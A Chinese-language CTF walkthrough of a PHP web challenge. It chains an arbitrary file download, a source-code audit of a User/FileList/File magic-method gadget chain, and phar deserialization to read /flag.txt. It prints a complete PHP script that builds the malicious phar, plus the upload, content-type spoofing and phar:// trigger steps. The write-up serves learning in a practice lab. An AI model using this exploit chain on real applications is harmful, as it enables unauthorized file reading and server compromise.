开启靶场环境
是一个登陆界面
我们先去注册,然后进行登陆 test/test
界面有上传文件的功能,先上传一张jpg
可以看到有下载和删除的选项
猜测下载这里有任意文件下载
使用burpsuite抓包看下载的时候跳转到了哪个界面,发现是download.php
同时确实有任意文件下载
我们到download.php页面使用hackbar直接进行下载,防止乱码
最后下载的文件有class.php,delete.php,download.php,login.php,index.php,register.php
接下来就是代码审计了
看一下download.php
发现限制了下载文件的目录在/etc/tmp下,很常规的下载操作,下载的时候禁止下载文件名里面包含flag的文件
接着我们看delete.php的代码
看了之后好像也没有特别的地方,仅仅是返回一个删除文件是否成功的相应并输出该响应
再看一下class.php文件,代码有点多,我就直接放关键部分的截图吧(轻喷
User类里面有__construct()构造方法和__destruct()析构方法,当User对象被销毁的时候会执行db参数的close()方法
在FileList类的构造方法里面创建了File对象,在魔术方法__call里面,如果对应的方法在FilelIST类里面没有的话,就执行File对象的这个方法,同时将执行结果储存在results数组里面
当FileList对象被销毁的时候,则将results数组里面的内容全部输出出来
接着我们看File类
可以看出在这里对$filename进行了file_exists和is_dir的检查,这是两个人畜无害的函数,接着在File类的close方法里面,有file_get_contents函数读取文件
看到file_get_contents函数,我们就应该注意一下,因为这里是源代码里面唯一可以读取文件的地方,所以破题的地方很可能就是这里。
梳理一下思路,我们想要调用File类里面close()方法,恰好FileList类里面没有close方法,但是FileList类的__call魔术方法说的是如果没有这个方法,则调用new 的 File对象的这个方法,可以大胆地估计,这个要调用的方法,正是close方法。接着,在User类的析构方法中,会调用db参数的close方法,于是我们希望创建一个user对象,其中它的db变量正是一个FileList对象,对象中的文件名是我们猜测的flag所在的地方,/flag.txt或者/flag,这样,当user对象销毁的时候,就会调用db变量的close方法,但是FileList类里面没有close方法,于是转入__call魔术方法,执行File对象的close方法。通过简单的分析,close方法执行后存在results变量里面的结果会被加入到table变量中被打印出来,也就是最后会输出flag
所以现在问题变成了创建这样的一个User对象,这里需要借助phar伪协议。
关于phar伪协议的用法,这里贴两个链接
https://xz.aliyun.com/t/2715https://paper.seebug.org/680/Phar反序列化的利用条件为:
1.phar文件要能够上传到服务器端。
2.要有可用的魔术方法作为“跳板”。
3.文件操作函数的参数可控,且:、/、phar等特殊字符没有被过滤。在这个环境中条件都满足,同时class.php中的delete函数使用了unlink函数
于是我们先构造这样的一个phar文件
贴上一位师傅的EXP
<?php
// add object of any class as meta data
class User
{
public $db;
}
class FileList
{
private $files;
public function __construct()
{
$this->files=array(new File());
}
}
class File
{
public $filename='/flag.txt';
}
$b=new FileList();
$c=new User();
$c->db=$b;
// create new Phar
$phar = new Phar('test.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ? >');
$phar->setMetadata($c);
$phar->stopBuffering();
?>为了在本地生成phar文件,记得在php.ini配置文件里面修改
将其改为off
将生成的文件上传
bp抓包改类型为image/gif
之后删除
抓包修改为filename=phar://test.gif
flag在response里
